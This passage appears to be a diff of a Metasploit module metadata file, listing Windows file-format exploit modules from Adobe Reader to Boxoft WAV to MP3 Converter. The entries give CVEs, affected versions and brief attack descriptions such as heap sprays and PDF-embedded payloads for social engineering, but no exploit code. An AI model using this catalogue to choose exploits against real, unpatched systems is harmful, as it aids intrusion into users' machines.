"arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v9.0.0 (Windows XP SP3 English)", - "Adobe Reader v8.1.2 (Windows XP SP2 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_jbig2decode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_libtiff": { - "name": "Adobe Acrobat Bundled LibTIFF Integer Overflow", - "fullname": "exploit/windows/fileformat/adobe_libtiff", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-02-16", - "type": "exploit", - "author": [ - "Microsoft", - "villy ", - "jduck " - ], - "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.", - "references": [ - "CVE-2010-0188", - "BID-38195", - "OSVDB-62526", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html", - "URL-http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76", - "URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_libtiff", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_media_newplayer": { - "name": "Adobe Doc.media.newPlayer Use After Free Vulnerability", - "fullname": "exploit/windows/fileformat/adobe_media_newplayer", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-12-14", - "type": "exploit", - "author": [ - "unknown", - "hdm ", - "pusscat ", - "jduck " - ], - "description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.", - "references": [ - "CVE-2009-4324", - "BID-37331", - "OSVDB-60980" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows English (JS Heap Spray)", - "Adobe Reader Windows German (JS Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_media_newplayer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_pdf_embedded_exe": { - "name": "Adobe PDF Embedded EXE Social Engineering", - "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "Colin Ames ", - "jduck " - ], - "description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.", - "references": [ - "CVE-2010-1240", - "OSVDB-63667", - "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", - "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", - "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)" - ], - "mod_time": "2024-08-26 16:47:26 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_pdf_embedded_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": { - "name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", - "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "Jeremy Conway " - ], - "description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.", - "references": [ - "CVE-2010-1240", - "OSVDB-63667", - "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", - "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", - "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_reader_u3d": { - "name": "Adobe Reader U3D Memory Corruption Vulnerability", - "fullname": "exploit/windows/fileformat/adobe_reader_u3d", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-12-06", - "type": "exploit", - "author": [ - "Felipe Andres Manzano", - "sinn3r ", - "juan vazquez ", - "jduck " - ], - "description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.", - "references": [ - "CVE-2011-2462", - "OSVDB-77529", - "BID-50922", - "URL-http://www.adobe.com/support/security/advisories/apsa11-04.html", - "URL-http://web.archive.org/web/20210228195907/http://blog.9bplus.com/analyzing-cve-2011-2462/", - "URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0", - "URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_reader_u3d", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_toolbutton": { - "name": "Adobe Reader ToolButton Use After Free", - "fullname": "exploit/windows/fileformat/adobe_toolbutton", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-08-08", - "type": "exploit", - "author": [ - "Soroush Dalili", - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.", - "references": [ - "CVE-2013-3346", - "OSVDB-96745", - "ZDI-13-212", - "URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP / Adobe Reader 9/10/11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_toolbutton", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_u3d_meshdecl": { - "name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", - "fullname": "exploit/windows/fileformat/adobe_u3d_meshdecl", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-13", - "type": "exploit", - "author": [ - "Felipe Andres Manzano ", - "jduck " - ], - "description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2009-3953", - "OSVDB-61690", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows Universal (JS Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_u3d_meshdecl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_utilprintf": { - "name": "Adobe util.printf() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_utilprintf", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-08", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-2992", - "OSVDB-49520" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.1.2 (Windows XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_utilprintf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/allplayer_m3u_bof": { - "name": "ALLPlayer M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/allplayer_m3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-09", - "type": "exploit", - "author": [ - "metacom", - "Mike Czumak", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows 7 SP1.", - "references": [ - "CVE-2013-7409", - "BID-62926", - "BID-63896", - "EDB-28855", - "EDB-29549", - "EDB-29798", - "EDB-32041", - "OSVDB-98283", - "URL-http://www.allplayer.org/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - " ALLPlayer 2.8.1 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/allplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/altap_salamander_pdb": { - "name": "Altap Salamander 2.5 PE Viewer Buffer Overflow", - "fullname": "exploit/windows/fileformat/altap_salamander_pdb", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-19", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.", - "references": [ - "CVE-2007-3314", - "BID-24557", - "OSVDB-37579", - "URL-http://vuln.sg/salamander25-en.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal Salamander 2.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/altap_salamander_pdb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/aol_desktop_linktag": { - "name": "AOL Desktop 9.6 RTX Buffer Overflow", - "fullname": "exploit/windows/fileformat/aol_desktop_linktag", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "sup3r", - "sickn3ss", - "sinn3r ", - "mr_me ", - "silent_dream" - ], - "description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.", - "references": [ - "OSVDB-70741", - "EDB-16085" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AOL Desktop 9.6 on Windows XP SP3", - "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", - "AOL Desktop 9.6 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aol_desktop_linktag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/aol_phobos_bof": { - "name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow", - "fullname": "exploit/windows/fileformat/aol_phobos_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2010-01-20", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.", - "references": [ - "OSVDB-61964", - "EDB-11204", - "URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aol_phobos_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_pnsize": { - "name": "Apple QuickTime PICT PnSize Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_pnsize", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-08-08", - "type": "exploit", - "author": [ - "MC ", - "corelanc0d3r " - ], - "description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.", - "references": [ - "CVE-2011-0257", - "OSVDB-74687", - "EDB-17777", - "BID-49144" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 with DEP bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_pnsize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_rdrf": { - "name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_rdrf", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-22", - "type": "exploit", - "author": [ - "Jason Kratzer", - "Tom Gallagher", - "Paul Bates", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.", - "references": [ - "CVE-2013-1017", - "OSVDB-93625", - "BID-60097", - "URL-http://support.apple.com/kb/HT5770", - "ZDI-13-110" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_rdrf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_texml": { - "name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_texml", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-15", - "type": "exploit", - "author": [ - "Alexander Gavrun", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results the overflow.", - "references": [ - "OSVDB-81934", - "CVE-2012-0663", - "BID-53571", - "ZDI-12-107", - "URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html", - "URL-http://support.apple.com/kb/HT1222" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "QuickTime 7.7.1 on Windows XP SP3", - "QuickTime 7.7.0 on Windows XP SP3", - "QuickTime 7.6.9 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_texml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audio_coder_m3u": { - "name": "AudioCoder .M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/audio_coder_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-01", - "type": "exploit", - "author": [ - "metacom", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2017-8870", - "OSVDB-92939", - "EDB-25141" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audio_coder_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audio_wkstn_pls": { - "name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", - "fullname": "exploit/windows/fileformat/audio_wkstn_pls", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "germaya_x", - "dookie" - ], - "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2009-0476", - "OSVDB-55424", - "EDB-10353" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audio_wkstn_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audiotran_pls": { - "name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/audiotran_pls", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-01-09", - "type": "exploit", - "author": [ - "Sebastien Duquette", - "dookie" - ], - "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.", - "references": [ - "CVE-2009-0476", - "OSVDB-55424", - "EDB-11079" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audiotran_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audiotran_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audiotran_pls_1424": { - "name": "Audiotran PLS File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/audiotran_pls_1424", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-09-09", - "type": "exploit", - "author": [ - "Philip OKeefe" - ], - "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.", - "references": [ - "EDB-14961" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audiotran_pls_1424", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/aviosoft_plf_buf": { - "name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/aviosoft_plf_buf", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-11-09", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.", - "references": [ - "OSVDB-77043", - "EDB-18096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Aviosoft DTV Player 1.0.1.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aviosoft_plf_buf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/bacnet_csv": { - "name": "BACnet OPC Client Buffer Overflow", - "fullname": "exploit/windows/fileformat/bacnet_csv", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-09-16", - "type": "exploit", - "author": [ - "Jeremy Brown", - "MC " - ], - "description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.", - "references": [ - "CVE-2010-4740", - "OSVDB-68096", - "BID-43289", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "Windows 2000 SP4 English" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/bacnet_csv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bacnet_csv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/beetel_netconfig_ini_bof": { - "name": "Beetel Connection Manager NetConfig.ini Buffer Overflow", - "fullname": "exploit/windows/fileformat/beetel_netconfig_ini_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-12", - "type": "exploit", - "author": [ - "metacom", - "wvu " - ], - "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n Manager. The vulnerability exists in the parsing of the UserName\n parameter in the NetConfig.ini file.\n\n The module has been tested successfully against version\n PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-98714", - "EDB-28969" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" - ], - "mod_time": "2020-02-04 10:05:41 +0000", - "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/blazedvd_hdtv_bof": { - "name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability", - "fullname": "exploit/windows/fileformat/blazedvd_hdtv_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-03", - "type": "exploit", - "author": [ - "b33f", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.", - "references": [ - "OSVDB-80896", - "EDB-18693", - "EDB-22931" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BlazeVideo HDTV Player Pro v6.6.0.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/blazedvd_hdtv_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/blazedvd_plf": { - "name": "BlazeDVD 6.1 PLF Buffer Overflow", - "fullname": "exploit/windows/fileformat/blazedvd_plf", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-03", - "type": "exploit", - "author": [ - "MC ", - "Deepak Rathore", - "Spencer McIntyre", - "Ken Smith" - ], - "description": "This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.", - "references": [ - "CVE-2006-6199", - "EDB-32737", - "OSVDB-30770", - "BID-35918" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BlazeDVD 6.2", - "BlazeDVD 5.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/blazedvd_plf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/boxoft_wav_to_mp3": { - "name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow", - "fullname": "exploit/windows/fileformat/boxoft_wav_to_mp3", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-31", - "type": "exploit", - "author": [ - "Robbie Corley", - "Shelby Pace" - ], - "description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.", - "references": [ - "CVE-2015-7243", - "EDB-38035" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Boxoft WAV to MP3 Converter v1.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 